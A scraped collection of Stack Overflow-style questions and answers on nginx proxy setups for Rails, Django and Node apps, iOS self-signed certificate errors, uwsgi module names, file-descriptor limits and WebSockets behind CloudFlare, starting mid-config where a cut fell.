#ssl_ciphers "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA+RC4 EECDH EDH+aRSA RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS";
ssl_prefer_server_ciphers on;And on the client side I've tried some different options with ATS:NSAppTransportSecurity
NSAllowsArbitraryLoads
andNSAppTransportSecurity
NSAllowsArbitraryLoads
NSExceptionDomains
test.example.com (NOT REALLY MY DOMAIN)
NSExceptionAllowsInsecureHTTPLoads
andNSAppTransportSecurity
NSAllowsArbitraryLoads
NSExceptionDomains
test.example.com (NOT REALLY MY DOMAIN)
NSExceptionAllowsInsecureHTTPLoads
NSExceptionRequiresForwardSecrecy
NSExceptionMinimumTLSVersion
TLSv1.1
Depending on different ATS options I get errors:An SSL error has occurred and a secure connection to the server cannot be made.orNSURLSession/NSURLConnection HTTP load failed (kCFStreamErrorDomainSSL, -9813)
The certificate for this server is invalid. You might be connecting to a server that is pretending to be “MYDOMAIN” which could put your confidential information at risk.Any ideas? Anyone else struggle with self signed certs?P.S. I'm on OS X 10.11.2 Beta, Xcode 7.1.1 | ios9 self signed certificate and app transport security |
When you access the app with the port, you are accessing the Rails server directly, not proxied by nginx. This is fine for debugging, but usually not good for production.

The Host header is probably not being passed on by the client; $host defaults to the nginx host.

Try

location @ruby {
proxy_set_header Host $host;
proxy_pass http://sub;
}

And a 'hardcoded' way:

proxy_set_header Host post.subdomain.me; | I want to deploy my Ruby on Rails application on my local computer with Nginx and a RoR web server (like Unicorn, Thin or WEBrick).

As shown below, I want to access my web app via the post subdomain:

upstream sub {
server unix:/tmp/unicorn.subdomain.sock fail_timeout=0;
# server 127.0.0.1:3000;
}
server {
listen 80;
server_name post.subdomain.me;
access_log /var/www/subdomain/log/access.log;
error_log /var/www/subdomain/log/error.log;
root /var/www/subdomain;
index index.html;
location / {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_redirect off;
try_files /system/maintenance.html $uri $uri/index.html $uri.html @ruby;
}
location @ruby {
proxy_pass http://sub;
}
}

Everything is working fine, and when I type post.subdomain.me I can see my RoR app.

Problem: When I use the post.subdomain.me URL, I can't access my subdomain (request.subdomain returns empty and request.host returns subdomain instead of subdomain.me). But when I use post.subdomain.me:3000 everything works perfectly (I lost half of my hair figuring that out). Why, and how can I resolve it? | Why I can't access to subdomain through nginx proxy pass?
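The failure in this question is exactly the Host header: Rails derives request.subdomain from whatever host name reaches it, so when nginx forwards its own default instead of the client's, the subdomain is lost. A toy version of that extraction (my sketch, not Rails' actual implementation):

```python
def subdomain(host, tld_length=1):
    """Return everything left of the domain, e.g. 'post' for 'post.subdomain.me'."""
    parts = host.split(":")[0].split(".")   # drop any :port, then split labels
    return ".".join(parts[:-(tld_length + 1)])

print(subdomain("post.subdomain.me"))  # -> post
```

With proxy_set_header Host $host in place, the original "post.subdomain.me" reaches Rails and the left-hand label survives; port 3000 worked because that request bypassed the proxy entirely.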
The answer is: uwsgi_file__, where the file path has underscores for the /s and possibly other substitutions. So when the path of the running script is /opt/www/example.com/www/blog.py, the __name__ will be uwsgi_file__opt_www_example_com_www_blog.

I did have to hack around on prod, but I think I got away with it. | What is the value of __name__ in this example when running under uwsgi?

if __name__ == '__main__':
from livereload import Server
server = Server(app.wsgi_app)
server.serve()

I just want to ensure this doesn't run when I push it to a production server using uwsgi under Nginx. | What __name__ string does uwsgi use?
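The mangling described in the answer can be reproduced mechanically. This is my reconstruction of the observed behavior (not uwsgi's actual source): strip the extension, then turn path separators and dots into underscores.

```python
def uwsgi_module_name(path):
    """Reproduce the observed __name__ for a file loaded by uwsgi."""
    base = path.rsplit(".", 1)[0]  # drop the .py extension
    return "uwsgi_file_" + base.replace("/", "_").replace(".", "_")

print(uwsgi_module_name("/opt/www/example.com/www/blog.py"))
# -> uwsgi_file__opt_www_example_com_www_blog
```

The practical upshot stands either way: under uwsgi, __name__ is never '__main__', so the livereload block above is safely skipped in production.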
The simplest way to handle the load is indeed to use a load balancer to forward the requests to different servers, on the same machine or on remote machines.

If you want to set up the servers on only one machine, use pm2; it will take care of the load balancing and keep your server instances alive.

Be aware that running on one machine doesn't give you high availability: in case of a random shutdown, your service will be down. I would advise running the server on multiple one-core machines rather than on one multi-core machine.
In order to do so, set up pm2/forever on each machine and another machine running nginx for load balancing. This article should get you started with nginx. | My node.js server will handle 50k simultaneous clients. A single node.js server isn't able to handle that amount of load, so I plan to set up 5 or 10 node.js servers running on different ports and have a load balancer, e.g. Nginx, in front of the node.js servers. When one server reaches 10k clients, the excess incoming connections are routed to the other node.js servers. Is this the right way to handle such load with node.js? If not, what's the best practice? | How to handle large amount of load with node.js server?
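The balancing step itself is simple: by default, an nginx upstream just rotates incoming requests across the listed instances. A minimal round-robin sketch in Python (illustrative only, not how you'd actually front Node in production):

```python
import itertools

backends = ["127.0.0.1:3001", "127.0.0.1:3002", "127.0.0.1:3003"]
rr = itertools.cycle(backends)  # endless round-robin over the instances

def pick_backend():
    """Choose the next upstream for an incoming connection."""
    return next(rr)
```

pm2 in cluster mode does the same kind of distribution across worker processes on one machine; nginx does it across machines.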
The solution was to do vagrant halt and then vagrant ssh again. Then it printed out the 10000. It looks like simply logging out and back in with the user was not enough for some reason. | I have a problem with the error: PHP failed to open stream: Too many open files.

I have looked at various answers here on Stack Overflow, but I am unable to solve this issue. I have mainly tried to increase the limit of max open files. I have edited /etc/security/limits.conf, where I specified this:
* hard nofile 30000After saving and logging out / rebooting the box, the command:ulimit -nStill prints out 1024. I am not sure why this has no effect and I think this is the reason I get the php error. If needed I can paste the whole file or any other configuration file. I am using PHP 5.6, nginx 1.8.0 and php-fpm.The solution which works for me now is to manually restart nginx with:service nginx restartAfter this things work again. Mainly the problem occurs when I run unit tests, behat tests or when I make a lot of requests to the web server. | PHP failed to open stream: Too many open files |
Try it like this:

server {
listen 80;
server_name server_domain_or_IP;
location = /favicon.ico { access_log off; log_not_found off; }
location / {
root /home/user/myproject;
}
}
server {
listen 80;
server_name api.server_domain_or_IP;
location = /favicon.ico { access_log off; log_not_found off; }
location / {
include proxy_params;
proxy_pass http://unix:/home/user/myproject/myproject.sock;
}
}

| I have set up a server according to this tutorial: https://www.digitalocean.com/community/tutorials/how-to-set-up-django-with-postgres-nginx-and-gunicorn-on-ubuntu-14-04

Everything is working a-okay, but I would like to change my NGINX setup to incorporate AngularJS for the front end. Right now I have it configured as the tutorial says: when I visit myip/ I get my Django app, and when I go to myip/static/ I get my static files. Great.

What I would like to do is serve the Django API from an api.myip subdomain, and have myip/ actually point to my static (Angular app) files.

Any insight on how to configure NGINX to route this correctly?

My NGINX config currently looks like this:

server {
listen 80;
server_name server_domain_or_IP;
location = /favicon.ico { access_log off; log_not_found off; }
location /static/ {
root /home/user/myproject;
}
location / {
include proxy_params;
proxy_pass http://unix:/home/user/myproject/myproject.sock;
}
} | Django REST AngularJS NGINX Config |
First, put your desired sub-URI path (i.e. main) in application.rb:

...
config.relative_url_root = "/main"
...

In config.ru, add these lines:
map SampleApplication::Application.config.relative_url_root || "/" do
run Rails.application
endInproduction.rb, add below line.# Enable serving of images, stylesheets, and JavaScripts from an asset server
config.action_controller.asset_host = "YOUR_DOMAIN_NAME/main"
# ActionMailer Config
config.action_mailer.default_url_options = {
:host => "YOUR_DOMAIN_NAME",
:only_path => false,
:script_name => "/main"
}In nginx configuration file, add these lineslocation /main {
alias /var/deploy/sample_application/current/public;
try_files $uri @main;
}
location @main {
proxy_http_version 1.1;
chunked_transfer_encoding off;
proxy_buffering off;
proxy_cache off;
proxy_redirect off;
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_pass http://puma_sample_application;
} | We have set up a production server for our rails app with Nginx and puma. We want to deploy our rails app at sub uri and on main domain we want to put wordpress for home page, pricing page etc.How we configure our rails that it able to run on sub uri which have Devise gem as authentication. Will we need to change our routes for sub uri?What will be the configuration for nginx and puma?Thanks in advance! | Deploy rails app at sub uri of a domain |
If you're trying to access this through CloudFlare's network, you'd need to explicitly have WebSockets enabled on your domain before they will work -- regardless of the port. As in, even if the port can pass through our network, that won't automatically mean that WebSockets will be enabled or accessible on your domain.

You can try contacting our support team to request an exception to see if they can enable it for your domain, but typically this is still only available at the business and enterprise levels.

Disclaimer: I work at CloudFlare. | I have a website behind CloudFlare. I need to enable WebSockets over SSL without turning off CloudFlare support. I have a PRO plan and hence won't get the new WebSocket support. I am using Nginx to proxy an SSL connection to a WebSocket running on a Node server. Now, I read somewhere that CloudFlare would support WebSockets on approved ports, so I'm using 8443 for the Nginx port and another port for the Node server. Using wscat, it returns a 200 error:

$ wscat -c wss://xyz.com:8443
error: Error: unexpected server response (200)

I know that the WebSocket handshake expects a 101 code. However, if I visit https://xyz.com:8443, I can see the page displayed by the Node server telling me the proxy is working. Also, once I turn off CloudFlare support, the WebSocket starts working. Any clues to get this working? I know I can create a subdomain, but I'd prefer running the WebSocket behind CloudFlare. | WebSocket over SSL: Cloudflare
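The 200 in that wscat error is the whole story: a WebSocket client only proceeds when the server answers the handshake with 101 Switching Protocols plus the upgrade headers, and a proxy that isn't WebSocket-aware answers with a plain 200 page instead. A small validity check in Python (illustrative):

```python
def is_websocket_handshake(status_code, headers):
    """True only for a correct server handshake reply (RFC 6455 style)."""
    upgrade = headers.get("Upgrade", "").lower()
    connection = headers.get("Connection", "").lower()
    return status_code == 101 and upgrade == "websocket" and "upgrade" in connection
```

The 200 observed through CloudFlare fails this check, while the direct connection (CloudFlare bypassed) returns the expected 101.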
Basically, Unicorn and Thin are both single-threaded servers, which in a way means they handle a single request at a time, using deferring and other techniques.

For a production setup you would generally run many instances of Unicorn or Thin (depending on your load, etc.), and you would need to load balance between those Rails application server instances; that's why you need Nginx or something similar on top. | Currently I have already read a lot of tutorials about Rails app deployment, and almost every one of them uses Nginx or an alternative like Apache to serve static pages. Also, in this Q&A (Why do we need nginx with thin on production setup?) they said Nginx is used for load balancing.

I can understand the reasons mentioned above, but I wrote a Rails app as a pure API backend service whose only purpose is to serve JSON-formatted data for client-side apps, with no page rendering at all. So my questions are:

In my situation, do I really need Nginx just to deploy a pure API Rails app?

If not, how should I deploy my app? Is just running it (with Unicorn in the production env) in the background good enough, like rails server -e production -d?

I'm very curious about these two questions; I hope someone can explain the details or show me some good references. Thanks in advance. | Is it necessary to use Nginx when deploy a Rails API ONLY app?